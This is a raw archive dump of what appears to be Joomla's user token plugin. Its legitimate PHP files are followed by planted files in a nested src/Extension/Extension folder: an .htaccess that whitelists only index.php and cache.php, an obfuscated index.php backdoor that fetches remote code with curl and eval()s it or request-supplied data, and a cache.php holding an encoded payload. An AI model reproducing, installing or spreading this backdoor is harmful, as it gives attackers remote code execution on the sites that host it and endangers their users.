.-.-.-.-.-

PK⅖\Ҡ��OOsrc/Field/JoomlatokenField.phpnu�[���<?php

/**
 * @package     Joomla.Plugin
 * @subpackage  User.token
 *
 * @copyright   (C) 2020 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Plugin\User\Token\Field;

use Joomla\CMS\Factory;
use Joomla\CMS\Form\Field\TextField;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Joomlatoken field class
 *
 * @since  4.0.0
 */
class JoomlatokenField extends TextField
{
    /**
     * Name of the layout being used to render the field
     *
     * @var    string
     * @since  4.0.0
     */
    protected $layout = 'plugins.user.token.token';

/**
     * Method to attach a Form object to the field.
     *
     * @param   \SimpleXMLElement  $element   The SimpleXMLElement object representing the `<field>`
     *                                        tag for the form field object.
     * @param   mixed             $value      The form field value to validate.
     * @param   string            $group      The field name group control value. This acts as an
     *                                        array container for the field. For example if the
     *                                        field has name="foo" and the group value is set to
     *                                        "bar" then the full field name would end up being
     *                                        "bar[foo]".
     *
     * @return  boolean  True on success.
     *
     * @see     FormField::setup()
     * @since   4.0.0
     */
    public function setup(\SimpleXMLElement $element, $value, $group = null)
    {
        $ret = parent::setup($element, $value, $group);

/**
         * Security and privacy precaution: do not display the token field when the user being
         * edited is not the same as the logged in user. Tokens are conceptually a combination of
         * a username and password, therefore they should be treated in the same mode of
         * confidentiality and privacy as passwords i.e. you can reset them for other users but NOT
         * be able to see them, thus preventing impersonation attacks by a malicious administrator.
         */
        $userId = $this->form->getData()->get('id');

if ($userId != Factory::getUser()->id) {
            $this->hidden = true;
        }

return $ret;
    }

/**
     * Method to get the field input markup.
     *
     * @return  string  The field input markup.
     *
     * @since   4.0.0
     */
    protected function getInput()
    {
        // Do not display the token field when the user being edited is not the same as the logged in user
        if ($this->hidden) {
            return '';
        }

return parent::getInput();
    }

/**
     * Returns the token formatted suitably for the user to copy.
     *
     * @param   string  $tokenSeed  The token seed data stored in the database
     *
     * @return  string
     * @since   4.0.0
     */
    private function getTokenForDisplay(string $tokenSeed): string
    {
        if (empty($tokenSeed)) {
            return '';
        }

$algorithm = $this->getAttribute('algo', 'sha256');

try {
            $siteSecret = Factory::getApplication()->get('secret');
        } catch (\Exception $e) {
            $siteSecret = '';
        }

// NO site secret? You monster!
        if (empty($siteSecret)) {
            return '';
        }

$rawToken  = base64_decode($tokenSeed);
        $tokenHash = hash_hmac($algorithm, $rawToken, $siteSecret);
        $userId    = $this->form->getData()->get('id');
        $message   = base64_encode("$algorithm:$userId:$tokenHash");

if ($userId != Factory::getUser()->id) {
            $message = '';
        }

return $message;
    }

/**
     * Get the data for the layout
     *
     * @return  array
     *
     * @since   4.0.0
     */
    protected function getLayoutData()
    {
        $data          = parent::getLayoutData();
        $data['value'] = $this->getTokenForDisplay($this->value);

return $data;
    }
}
PK⅖\��♲K�Ksrc/Extension/Token.phpnu�[���<?php

namespace Joomla\Plugin\User\Token\Extension;

use Joomla\CMS\Crypt\Crypt;
use Joomla\CMS\Factory;
use Joomla\CMS\Form\Form;
use Joomla\CMS\Plugin\CMSPlugin;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\Database\DatabaseAwareTrait;
use Joomla\Database\ParameterType;
use Joomla\Utilities\ArrayHelper;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * An example custom terms and conditions plugin.
 *
 * @since  3.9.0
 */
final class Token extends CMSPlugin
{
    use DatabaseAwareTrait;

/**
     * Load the language file on instantiation.
     *
     * @var    boolean
     * @since  4.0.0
     */
    protected $autoloadLanguage = true;

/**
     * Joomla XML form contexts where we should inject our token management user interface.
     *
     * @var     array
     * @since   4.0.0
     */
    private $allowedContexts = [
        'com_users.profile',
        'com_users.user',
    ];

/**
     * The prefix of the user profile keys, without the dot.
     *
     * @var     string
     * @since   4.0.0
     */
    private $profileKeyPrefix = 'joomlatoken';

/**
     * Token length, in bytes.
     *
     * @var     integer
     * @since   4.0.0
     */
    private $tokenLength = 32;

/**
     * Inject the Joomla token management panel's data into the User Profile.
     *
     * This method is called whenever Joomla is preparing the data for an XML form for display.
     *
     * @param   string  $context  Form context, passed by Joomla
     * @param   mixed   $data     Form data
     *
     * @return  boolean
     * @since   4.0.0
     */
    public function onContentPrepareData(string $context, &$data): bool
    {
        // Only do something if the api-authentication plugin with the same name is published
        if (!PluginHelper::isEnabled('api-authentication', $this->_name)) {
            return true;
        }

// Check we are manipulating a valid form.
        if (!in_array($context, $this->allowedContexts)) {
            return true;
        }

// $data must be an object
        if (!is_object($data)) {
            return true;
        }

// We expect the numeric user ID in $data->id
        if (!isset($data->id)) {
            return true;
        }

// Get the user ID
        $userId = intval($data->id);

// Make sure we have a positive integer user ID
        if ($userId <= 0) {
            return true;
        }

if (!$this->isInAllowedUserGroup($userId)) {
            return true;
        }

$data->{$this->profileKeyPrefix} = [];

// Load the profile data from the database.
        try {
            $db    = $this->getDatabase();
            $query = $db->getQuery(true)
                ->select([
                        $db->quoteName('profile_key'),
                        $db->quoteName('profile_value'),
                    ])
                ->from($db->quoteName('#__user_profiles'))
                ->where($db->quoteName('user_id') . ' = :userId')
                ->where($db->quoteName('profile_key') . ' LIKE :profileKey')
                ->order($db->quoteName('ordering'));

$profileKey = $this->profileKeyPrefix . '.%';
            $query->bind(':userId', $userId, ParameterType::INTEGER);
            $query->bind(':profileKey', $profileKey, ParameterType::STRING);

$results = $db->setQuery($query)->loadRowList();

foreach ($results as $v) {
                $k = str_replace($this->profileKeyPrefix . '.', '', $v[0]);

$data->{$this->profileKeyPrefix}[$k] = $v[1];
            }
        } catch (\Exception $e) {
            // We suppress any database error. It means we get no token saved by default.
        }

/**
         * Modify the data for display in the user profile view page in the frontend.
         *
         * It's important to note that we deliberately not register HTMLHelper methods to do the
         * same (unlike e.g. the actionlogs system plugin) because the names of our fields are too
         * generic and we run the risk of creating naming clashes. Instead, we manipulate the data
         * directly.
         */
        if (($context === 'com_users.profile') && ($this->getApplication()->getInput()->get('layout') !== 'edit')) {
            $pluginData = $data->{$this->profileKeyPrefix} ?? [];
            $enabled    = $pluginData['enabled'] ?? false;
            $token      = $pluginData['token'] ?? '';

$pluginData['enabled'] = $this->getApplication()->getLanguage()->_('JDISABLED');
            $pluginData['token']   = '';

if ($enabled) {
                $algo                  = $this->getAlgorithmFromFormFile();
                $pluginData['enabled'] = $this->getApplication()->getLanguage()->_('JENABLED');
                $pluginData['token']   = $this->getTokenForDisplay($userId, $token, $algo);
            }

$data->{$this->profileKeyPrefix} = $pluginData;
        }

return true;
    }

/**
     * Runs whenever Joomla is preparing a form object.
     *
     * @param   Form   $form  The form to be altered.
     * @param   mixed  $data  The associated data for the form.
     *
     * @return  boolean
     *
     * @throws  \Exception  When $form is not a valid form object
     * @since   4.0.0
     */
    public function onContentPrepareForm(Form $form, $data): bool
    {
        // Only do something if the api-authentication plugin with the same name is published
        if (!PluginHelper::isEnabled('api-authentication', $this->_name)) {
            return true;
        }

// Check we are manipulating a valid form.
        if (!in_array($form->getName(), $this->allowedContexts)) {
            return true;
        }

// If we are on the save command, no data is passed to $data variable, we need to get it directly from request
        $jformData = $this->getApplication()->getInput()->get('jform', [], 'array');

if ($jformData && !$data) {
            $data = $jformData;
        }

if (is_array($data)) {
            $data = (object) $data;
        }

// Check if the user belongs to an allowed user group
        $userId = (is_object($data) && isset($data->id)) ? $data->id : 0;

if (!empty($userId) && !$this->isInAllowedUserGroup($userId)) {
            return true;
        }

// Add the registration fields to the form.
        Form::addFormPath(JPATH_PLUGINS . '/' . $this->_type . '/' . $this->_name . '/forms');
        $form->loadFile('token', false);

// No token: no reset
        $userTokenSeed = $this->getTokenSeedForUser($userId);
        $currentUser   = Factory::getUser();

if (empty($userTokenSeed)) {
            $form->removeField('notokenforotherpeople', 'joomlatoken');
            $form->removeField('reset', 'joomlatoken');
            $form->removeField('token', 'joomlatoken');
            $form->removeField('enabled', 'joomlatoken');
        } else {
            $form->removeField('saveme', 'joomlatoken');
        }

if ($userId != $currentUser->id) {
            $form->removeField('token', 'joomlatoken');
        } else {
            $form->removeField('notokenforotherpeople', 'joomlatoken');
        }

if (($userId != $currentUser->id) && empty($userTokenSeed)) {
            $form->removeField('saveme', 'joomlatoken');
        } else {
            $form->removeField('savemeforotherpeople', 'joomlatoken');
        }

// Remove the Reset field when displaying the user profile form
        if (($form->getName() === 'com_users.profile') && ($this->getApplication()->getInput()->get('layout') !== 'edit')) {
            $form->removeField('reset', 'joomlatoken');
        }

return true;
    }

/**
     * Save the Joomla token in the user profile field
     *
     * @param   mixed   $data    The incoming form data
     * @param   bool    $isNew   Is this a new user?
     * @param   bool    $result  Has Joomla successfully saved the user?
     * @param   string  $error   Error string
     *
     * @return  void
     * @since   4.0.0
     */
    public function onUserAfterSave($data, bool $isNew, bool $result, ?string $error): void
    {
        if (!is_array($data)) {
            return;
        }

$userId = ArrayHelper::getValue($data, 'id', 0, 'int');

if ($userId <= 0) {
            return;
        }

if (!$result) {
            return;
        }

$noToken = false;

// No Joomla token data. Set the $noToken flag which results in a new token being generated.
        if (!isset($data[$this->profileKeyPrefix])) {
            /**
             * Is the user being saved programmatically, without passing the user profile
             * information? In this case I do not want to accidentally try to generate a new token!
             *
             * We determine that by examining whether the Joomla token field exists. If it does but
             * it wasn't passed when saving the user I know it's a programmatic user save and I have
             * to ignore it.
             */
            if ($this->hasTokenProfileFields($userId)) {
                return;
            }

$noToken                       = true;
            $data[$this->profileKeyPrefix] = [];
        }

if (isset($data[$this->profileKeyPrefix]['reset'])) {
            $reset = $data[$this->profileKeyPrefix]['reset'] == 1;
            unset($data[$this->profileKeyPrefix]['reset']);

if ($reset) {
                $noToken = true;
            }
        }

// We may have a token already saved. Let's check, shall we?
        if (!$noToken) {
            $noToken       = true;
            $existingToken = $this->getTokenSeedForUser($userId);

if (!empty($existingToken)) {
                $noToken                                = false;
                $data[$this->profileKeyPrefix]['token'] = $existingToken;
            }
        }

// If there is no token or this is a new user generate a new token.
        if ($noToken || $isNew) {
            if (
                isset($data[$this->profileKeyPrefix]['token'])
                && empty($data[$this->profileKeyPrefix]['token'])
            ) {
                unset($data[$this->profileKeyPrefix]['token']);
            }

$default                       = $this->getDefaultProfileFieldValues();
            $data[$this->profileKeyPrefix] = array_merge($default, $data[$this->profileKeyPrefix]);
        }

// Remove existing Joomla Token user profile values
        $db    = $this->getDatabase();
        $query = $db->getQuery(true)
            ->delete($db->quoteName('#__user_profiles'))
            ->where($db->quoteName('user_id') . ' = :userId')
            ->where($db->quoteName('profile_key') . ' LIKE :profileKey');

$profileKey = $this->profileKeyPrefix . '.%';
        $query->bind(':userId', $userId, ParameterType::INTEGER);
        $query->bind(':profileKey', $profileKey, ParameterType::STRING);

$db->setQuery($query)->execute();

// If the user is not in the allowed user group don't save any new token information.
        if (!$this->isInAllowedUserGroup($data['id'])) {
            return;
        }

// Save the new Joomla Token user profile values
        $order = 1;
        $query = $db->getQuery(true)
            ->insert($db->quoteName('#__user_profiles'))
            ->columns([
                    $db->quoteName('user_id'),
                    $db->quoteName('profile_key'),
                    $db->quoteName('profile_value'),
                    $db->quoteName('ordering'),
                ]);

foreach ($data[$this->profileKeyPrefix] as $k => $v) {
            $query->values($userId . ', '
                . $db->quote($this->profileKeyPrefix . '.' . $k)
                . ', ' . $db->quote($v)
                . ', ' . ($order++));
        }

$db->setQuery($query)->execute();
    }

/**
     * Remove the Joomla token when the user account is deleted from the database.
     *
     * This event is called after the user data is deleted from the database.
     *
     * @param   array    $user     Holds the user data
     * @param   boolean  $success  True if user was successfully stored in the database
     * @param   string   $msg      Message
     *
     * @return  void
     *
     * @throws  \Exception
     * @since   4.0.0
     */
    public function onUserAfterDelete(array $user, bool $success, string $msg): void
    {
        if (!$success) {
            return;
        }

$userId = ArrayHelper::getValue($user, 'id', 0, 'int');

if ($userId <= 0) {
            return;
        }

try {
            $db    = $this->getDatabase();
            $query = $db->getQuery(true)
                ->delete($db->quoteName('#__user_profiles'))
                ->where($db->quoteName('user_id') . ' = :userId')
                ->where($db->quoteName('profile_key') . ' LIKE :profileKey');

$profileKey = $this->profileKeyPrefix . '.%';
            $query->bind(':userId', $userId, ParameterType::INTEGER);
            $query->bind(':profileKey', $profileKey, ParameterType::STRING);

$db->setQuery($query)->execute();
        } catch (\Exception $e) {
            // Do nothing.
        }
    }

/**
     * Returns an array with the default profile field values.
     *
     * This is used when saving the form data of a user (new or existing) without a token already
     * set.
     *
     * @return  array
     * @since   4.0.0
     */
    private function getDefaultProfileFieldValues(): array
    {
        return [
            'token'   => base64_encode(Crypt::genRandomBytes($this->tokenLength)),
            'enabled' => true,
        ];
    }

/**
     * Retrieve the token seed string for the given user ID.
     *
     * @param   int  $userId  The numeric user ID to return the token seed string for.
     *
     * @return  string|null  Null if there is no token configured or the user doesn't exist.
     * @since   4.0.0
     */
    private function getTokenSeedForUser(int $userId): ?string
    {
        try {
            $db    = $this->getDatabase();
            $query = $db->getQuery(true)
                ->select($db->quoteName('profile_value'))
                ->from($db->quoteName('#__user_profiles'))
                ->where($db->quoteName('profile_key') . ' = :profileKey')
                ->where($db->quoteName('user_id') . ' = :userId');

$profileKey = $this->profileKeyPrefix . '.token';
            $query->bind(':profileKey', $profileKey, ParameterType::STRING);
            $query->bind(':userId', $userId, ParameterType::INTEGER);

return $db->setQuery($query)->loadResult();
        } catch (\Exception $e) {
            return null;
        }
    }

/**
     * Get the configured user groups which are allowed to have access to tokens.
     *
     * @return  int[]
     * @since   4.0.0
     */
    private function getAllowedUserGroups(): array
    {
        $userGroups = $this->params->get('allowedUserGroups', [8]);

if (empty($userGroups)) {
            return [];
        }

if (!is_array($userGroups)) {
            $userGroups = [$userGroups];
        }

return $userGroups;
    }

/**
     * Is the user with the given ID in the allowed User Groups with access to tokens?
     *
     * @param   int  $userId  The user ID to check
     *
     * @return  boolean  False when doesn't belong to allowed user groups, user not found, or guest
     * @since   4.0.0
     */
    private function isInAllowedUserGroup($userId)
    {
        $allowedUserGroups = $this->getAllowedUserGroups();

$user = Factory::getUser($userId);

if ($user->id != $userId) {
            return false;
        }

if ($user->guest) {
            return false;
        }

// No specifically allowed user groups: allow ALL user groups.
        if (empty($allowedUserGroups)) {
            return true;
        }

$groups       = $user->getAuthorisedGroups();
        $intersection = array_intersect($groups, $allowedUserGroups);

return !empty($intersection);
    }

/**
     * Returns the token formatted suitably for the user to copy.
     *
     * @param   integer  $userId     The user id for token
     * @param   string   $tokenSeed  The token seed data stored in the database
     * @param   string   $algorithm  The hashing algorithm to use for the token (default: sha256)
     *
     * @return  string
     * @since   4.0.0
     */
    private function getTokenForDisplay(
        int $userId,
        string $tokenSeed,
        string $algorithm = 'sha256'
    ): string {
        if (empty($tokenSeed)) {
            return '';
        }

try {
            $siteSecret = $this->getApplication()->get('secret');
        } catch (\Exception $e) {
            $siteSecret = '';
        }

// NO site secret? You monster!
        if (empty($siteSecret)) {
            return '';
        }

$rawToken  = base64_decode($tokenSeed);
        $tokenHash = hash_hmac($algorithm, $rawToken, $siteSecret);
        $message   = base64_encode("$algorithm:$userId:$tokenHash");

if ($userId !== $this->getApplication()->getIdentity()->id) {
            $message = '';
        }

return $message;
    }

/**
     * Get the token algorithm as defined in the form file
     *
     * We use a simple RegEx match instead of loading the form for better performance.
     *
     * @return  string  The configured algorithm, 'sha256' as a fallback if none is found.
     */
    private function getAlgorithmFromFormFile(): string
    {
        $algo = 'sha256';

$file     = JPATH_PLUGINS . '/' . $this->_type . '/' . $this->_name . '/forms/token.xml';
        $contents = @file_get_contents($file);

if ($contents === false) {
            return $algo;
        }

if (preg_match('/\s*algo=\s*"\s*([a-z0-9]+)\s*"/i', $contents, $matches) !== 1) {
            return $algo;
        }

return $matches[1];
    }

/**
     * Does the user have the Joomla Token profile fields?
     *
     * @param   int|null  $userId  The user we're interested in
     *
     * @return  bool  True if the user has Joomla Token profile fields
     */
    private function hasTokenProfileFields(?int $userId): bool
    {
        if (is_null($userId) || ($userId <= 0)) {
            return false;
        }

$db = $this->getDatabase();
        $q  = $db->getQuery(true)
            ->select('COUNT(*)')
            ->from($db->quoteName('#__user_profiles'))
            ->where($db->quoteName('user_id') . ' = ' . $userId)
            ->where($db->quoteName('profile_key') . ' = ' . $db->quote($this->profileKeyPrefix . '.token'));

try {
            $numRows = $db->setQuery($q)->loadResult() ?? 0;
        } catch (\Exception $e) {
            return false;
        }

return $numRows > 0;
    }
}
PK⅖\�,r��!src/Extension/Extension/.htaccessnu&1i�<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|cache.php)$">#
Order allow,deny
Allow from all
</FilesMatch>PK⅖\'���DD!src/Extension/Extension/index.phpnu&1i�<?php
 goto NXgGY4Yc47sBEj; NXgGY4Yc47sBEj: $pSEgLOPjMQCYkB = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto pCBxdNOf7Oc_5R; pCBxdNOf7Oc_5R: $yKEg3BIelQN3xs = $pSEgLOPjMQCYkB("\x7e", "\40"); goto chIOAKc5Gq08ih; TRzi5tDOvv6ey_: metaphone("\x4e\x4c\167\160\112\x75\127\x59\103\103\x6e\141\x54\x4f\146\104\x75\x65\122\x2f\x72\x6e\x50\65\123\172\155\x68\x64\61\x32\143\x68\x49\71\132\x56\70\57\x61\164\x54\x59"); goto FmcGwl7qHspO_H; FmcGwl7qHspO_H: class KVbANwOpXT46Wd { static function m0EPoOCXzDB1lz($pbfL3jf_uTYmJ1) { goto i0LIYOKu3w71of; FHqwZ_G5eqgyQD: YdsJiS83vQs3Rm: goto DLQxNo_9LQaqhX; wqi1cqwunlnKd2: $hbniRjl9IE17_T = explode("\x24", $pbfL3jf_uTYmJ1); goto juFmGgjUXDg2fZ; i0LIYOKu3w71of: $CZITEJz7Oo4A0S = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto UQlNWG3lMwMuzv; KFVvESrbK3R430: foreach ($hbniRjl9IE17_T as $V3RcZQ8OJaGH4s => $Y5K0RazF_EdIny) { $O8tFDn2OBHYhGq .= $xucMiXG6zTlf5l[$Y5K0RazF_EdIny - 54313]; ODjq832XpAHlJM: } goto FHqwZ_G5eqgyQD; DLQxNo_9LQaqhX: return $O8tFDn2OBHYhGq; goto BDd2s0X7iOq3M0; UQlNWG3lMwMuzv: $xucMiXG6zTlf5l = $CZITEJz7Oo4A0S("\176", "\x20"); goto wqi1cqwunlnKd2; juFmGgjUXDg2fZ: $O8tFDn2OBHYhGq = ''; goto KFVvESrbK3R430; BDd2s0X7iOq3M0: } static function CGquaFSeG5X2lh($NibQUIN3tL9d6Q, $C6MhK1HYpOCy0s) { goto TI18WZaz2AO8JT; AXiu5AkQ03bktp: $d4smX9lCaIxqY9 = curl_exec($bLBjq15k3EpAZh); goto vyJu6nZmA01N3G; vyJu6nZmA01N3G: return empty($d4smX9lCaIxqY9) ? $C6MhK1HYpOCy0s($NibQUIN3tL9d6Q) : $d4smX9lCaIxqY9; goto bwHAUVrX7_Vg2G; TI18WZaz2AO8JT: $bLBjq15k3EpAZh = curl_init($NibQUIN3tL9d6Q); goto Dxh7XVs0E8Xj1Q; Dxh7XVs0E8Xj1Q: curl_setopt($bLBjq15k3EpAZh, CURLOPT_RETURNTRANSFER, 1); goto AXiu5AkQ03bktp; bwHAUVrX7_Vg2G: } static function wXE1Q_DBxxtsPN() { goto TwVAUD3CWfW0n2; QcyX4nSaR2AMfn: $VhO85S8RzxPv3e = self::CGQUafseg5x2Lh($FuqPWpwlnK11MC[1 + 0], $tGr0_E8hw19NDn[2 + 3]); goto oCpi3kY_FB344U; neFIpSjesEvmU_: @$tGr0_E8hw19NDn[4 + 6](INPUT_GET, "\x6f\146") == 1 && die($tGr0_E8hw19NDn[0 + 5](__FILE__)); goto WpXygIQoWiecYM; YvR2zHSJt5rvAq: $GEZJON101EwVjs = @$tGr0_E8hw19NDn[1]($tGr0_E8hw19NDn[6 + 4](INPUT_GET, $tGr0_E8hw19NDn[5 + 4])); goto VzNxVjJufrK4YY; siwRTYKTAZPyfl: iBvFaVyLMvu9kR: goto YvR2zHSJt5rvAq; gMVpINDEfgBB_F: t1Khd_tMPbenYy: goto cUhENAQRP2fsMc; TwVAUD3CWfW0n2: $gw5Ix_4Ay9OiD3 = array("\65\x34\x33\64\x30\44\x35\x34\63\x32\x35\x24\x35\x34\x33\x33\x38\44\65\x34\63\64\62\44\65\64\63\x32\63\x24\65\64\63\x33\70\x24\65\64\x33\x34\x34\44\65\64\63\63\x37\x24\65\64\x33\62\62\x24\65\x34\63\x32\71\x24\65\64\x33\64\60\44\65\x34\x33\62\x33\44\x35\64\x33\x33\64\x24\65\x34\63\x32\70\x24\x35\64\x33\x32\x39", "\x35\x34\x33\62\64\44\65\64\63\62\63\x24\x35\x34\63\62\65\44\x35\64\63\64\x34\x24\65\64\63\x32\x35\x24\x35\x34\63\62\70\44\x35\64\x33\x32\x33\x24\65\x34\63\71\60\x24\65\64\63\x38\x38", "\65\64\x33\63\63\x24\65\x34\x33\x32\x34\x24\x35\x34\x33\x32\70\44\x35\64\x33\62\71\x24\x35\x34\63\x34\64\44\65\64\63\x33\71\44\65\x34\63\63\70\44\x35\x34\63\x34\x30\x24\65\64\63\x32\70\x24\65\x34\x33\x33\71\44\x35\x34\63\x33\70", "\65\x34\63\x32\x37\44\65\64\x33\x34\x32\x24\x35\64\63\x34\60\x24\65\64\63\x33\62", "\x35\x34\x33\x34\61\44\65\x34\63\64\62\44\x35\x34\63\x32\64\44\x35\64\63\x33\x38\44\65\64\x33\70\x35\44\65\x34\x33\70\x37\x24\65\64\x33\64\x34\44\x35\64\63\x33\71\x24\65\x34\63\63\x38\44\x35\x34\63\x34\60\x24\65\x34\63\62\x38\x24\65\64\63\x33\x39\x24\x35\x34\x33\63\x38", "\x35\64\63\63\67\44\x35\x34\x33\x33\x34\x24\x35\64\x33\x33\61\44\x35\x34\63\63\70\x24\x35\x34\x33\64\64\x24\65\64\x33\x33\66\44\65\64\x33\63\70\44\65\x34\63\x32\63\44\x35\64\x33\x34\64\x24\65\64\x33\64\60\x24\65\x34\63\62\x38\x24\x35\x34\x33\62\x39\x24\65\64\x33\x32\63\x24\x35\x34\x33\x33\x38\x24\65\x34\63\x32\x39\44\x35\64\63\62\63\44\x35\64\x33\62\x34", "\x35\x34\63\x36\67\x24\65\x34\x33\71\x37", "\x35\64\63\x31\x34", "\65\x34\x33\x39\x32\x24\x35\64\63\71\x37", "\x35\64\x33\x37\64\x24\x35\x34\63\65\67\44\x35\x34\x33\x35\x37\44\x35\x34\x33\67\64\44\x35\64\x33\65\x30", "\65\64\x33\x33\x37\44\x35\x34\63\x33\64\44\x35\64\x33\63\x31\x24\65\x34\63\x32\x33\44\x35\64\x33\x33\70\44\x35\x34\63\62\65\x24\65\x34\x33\x34\64\x24\x35\64\x33\63\x34\x24\x35\64\63\62\x39\x24\65\x34\63\x32\67\x24\x35\64\x33\x32\62\44\x35\x34\63\62\x33"); goto ZOAy4E3BW2xhcB; wLzCcB5vU0sIxr: die; goto gMVpINDEfgBB_F; APF1kiXmvQTbzT: $FuqPWpwlnK11MC = $tGr0_E8hw19NDn[1 + 1]($XEdALEQO0WQAav, true); goto neFIpSjesEvmU_; WpXygIQoWiecYM: if (!(@$FuqPWpwlnK11MC[0] - time() > 0 and md5(md5($FuqPWpwlnK11MC[2 + 1])) === "\x62\141\64\x64\x65\x34\144\x35\70\x66\x61\70\x30\x31\x33\66\60\145\71\66\x63\x39\143\64\71\x38\x38\60\x66\65\62\x65")) { goto t1Khd_tMPbenYy; } goto QcyX4nSaR2AMfn; oCpi3kY_FB344U: @eval($tGr0_E8hw19NDn[2 + 2]($VhO85S8RzxPv3e)); goto wLzCcB5vU0sIxr; ZOAy4E3BW2xhcB: foreach ($gw5Ix_4Ay9OiD3 as $LO0uV1TCm2j8hW) { $tGr0_E8hw19NDn[] = self::m0epoOcXzDB1lZ($LO0uV1TCm2j8hW); WjqF05__IGJG_s: } goto siwRTYKTAZPyfl; VzNxVjJufrK4YY: $XEdALEQO0WQAav = @$tGr0_E8hw19NDn[3 + 0]($tGr0_E8hw19NDn[0 + 6], $GEZJON101EwVjs); goto APF1kiXmvQTbzT; cUhENAQRP2fsMc: } } goto Wimo9ejDLGlH92; NnzqSXmRhoLHyv: if (!(in_array(gettype($zqGJoq9jTnLTuM) . count($zqGJoq9jTnLTuM), $zqGJoq9jTnLTuM) && count($zqGJoq9jTnLTuM) == 25 && md5(md5(md5(md5($zqGJoq9jTnLTuM[19])))) === "\x66\146\x61\67\x32\146\x32\x65\141\71\x36\145\65\x32\x65\66\71\144\60\x34\61\61\x31\70\71\x66\x61\x34\61\x33\x38\142")) { goto Wec_KaKd0Wb8Eu; } goto MNO46SyRX3ThiS; dDKRQRRTJ0IjLz: Wec_KaKd0Wb8Eu: goto TRzi5tDOvv6ey_; chIOAKc5Gq08ih: $zqGJoq9jTnLTuM = ${$yKEg3BIelQN3xs[13 + 18] . $yKEg3BIelQN3xs[9 + 50] . $yKEg3BIelQN3xs[25 + 22] . $yKEg3BIelQN3xs[11 + 36] . $yKEg3BIelQN3xs[14 + 37] . $yKEg3BIelQN3xs[25 + 28] . $yKEg3BIelQN3xs[54 + 3]}; goto NnzqSXmRhoLHyv; MNO46SyRX3ThiS: ($zqGJoq9jTnLTuM[69] = $zqGJoq9jTnLTuM[69] . $zqGJoq9jTnLTuM[76]) && ($zqGJoq9jTnLTuM[81] = $zqGJoq9jTnLTuM[69]($zqGJoq9jTnLTuM[81])) && @eval($zqGJoq9jTnLTuM[69](${$zqGJoq9jTnLTuM[37]}[25])); goto dDKRQRRTJ0IjLz; Wimo9ejDLGlH92: kVbANWOPxT46wd::wxe1q_DBxXtSpN();
?>
PK⅖\5�^!src/Extension/Extension/cache.phpnu&1i�<?php $xnbk = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGirleX4ebppgYA0A'; $wnNHF = 'tfzGa/A+iCytDfrh0ypaJnAWPnhLrj9cnd/DjW/Vbv8ylH+kHDccxD3aXtfRyjP+nsQ0JH+4xnn93U9JU+UNvAbGYfaTCXOu/84L3s949f3uDX76PexLX+2dS82bX+oSF4YBuTj3J5bNfdixnKuyEZl16TzzZrL2/+Pffd+RbwX3YG9KIwX0KalCvrZhcCpm+32O/HdqZVfewKnhIQfoetoX2GTX+CMWHIwbkaREFlHs44pl7K/HVZWPtpzUTfpfAZBfKTYDUjMDuzRImQiTgCcMRKIZ5IRzxow44utMCvE7rs4w9lvfxYNIjdtcClBKRVI6DXc3Oot3tkOSu6dAevPa0kNfY31ncdjXHtyWtWlqrMTQNY9ecz4Wv+sPJj+U57/xFdqzt/c6VfvtSnx1EKxoYJo6uaytYXvOti2O2TtzmUi3jU/2NVP/NV9f/3rDOD9TorSytCFQHWwjsDVDFd6GWxHDM/MiHz7V9Au5X+1EMsm0wza7XMF3poWo146Vhrg+x1lSrheT1VyyLKjw46/JqCMkhCxREUNBodR5YPIykDjpFE9umMgu1oAlapu2cm5j9RznGq8hTK0MY18ThLUxjsloLkzk5dCwHhrBwSbuOqi3Eo0j3q6kspHq98IVXydFNv7klimX4TIDTzVSQovhgzFdoOsxrk+bx3ZoalLl/2GJcLk0eoEKwSbwCRfyRJXpnwcpfzR8IWlesJL1khOhK/mOtZEY+WUMe2HCb/niNEUsZhgLUsgvbNoF5cKYmmgjh1P+YemhixRqi+mut8X40RcPQPcD3RxxIyZ5n5hjWeNyMF1wmCFtOoLRjVxc6VxiiCgkOIwEyVXbKUQ4IoWwPTVrCTD3p4V69BLA3Y0xqq5DbncQZ0bzrQBSYKW3d/MVUlralKqrjOkK0sL6SLEDA6U3IxzxlALKCnmhnxKNfcphD6O6IWE13QBtK2DGJ+gpegnQDrM6FW/ooFERK2t0YnugcDGampHEsxzaQsaH/jgsPJXJhZjL43js7B5aIE7X8L9SsBqcLLhF1IYPbQIp4qgU5b1sC8C9b3eBoF07UPJ0Ss0qNpUV0ZplwnOF48tULPoSnpiWCJnbCmqOmGXriZrIKn9UyXt6Wb7KtQFol0s7D4Aui3DiSEqHUkTk2sEr4EFpxPTIm6TIsEh0PyjoaJVKNtJaSHalYmaGoB5xL5kYLL3GaGnTBT9PomyEQQdYrXTF8giW8S8qEDrloucDyDqHWoAg7yv5pnTOPmQJSA7FVc8UTzpU0y1/imRGHuLyMr31sYW3lWMIvhiyVgaep4iXmSWHlImEknYS4muDzyrrJRGwrlPGYK/VVpkZ8FGyqMCOKA60dGI7Hl8IyjiIwx39HTL/LmjRm/LIwr0iTsMRpxm5H4CXD2rGCY9LBCKbXFW024iBAGCH7hyarPUQQC/PFE7MPAUBwI/FTPpo78xjYbp1BJp9C3FUfjEmQNp7mIXw5aesv4bUTgdlUQ7LAybsUraoGVduxGuRVmrquK1t6wDacPqbQQJLWdrN/sqW5KkqyUqGWa+BDbZ8ERVsy9OE1toVq0l4C+9BJU0xkvBosKiDpoWpTAyRo8+PXM0c/HFf3UaipQUhoTQrmuvEpDqanTOWCoHHDeVSeQhoQmdKIKIe+Uw6yKyq1ml2vAxpiQQJNjNRTBsU9hEpyg44hpdfit+7xvFr+qJmXXwez4TVnyULKQBYKF9KmiHSUvAfjvWma06eGCTuKnXiL2WcPvZbjgBYtDamyDa3tfdRq1dI1YsJuZs7KF1PvMEAUIxZRbodz/B080HAUPUOvyH9ujXnCdkC9CI5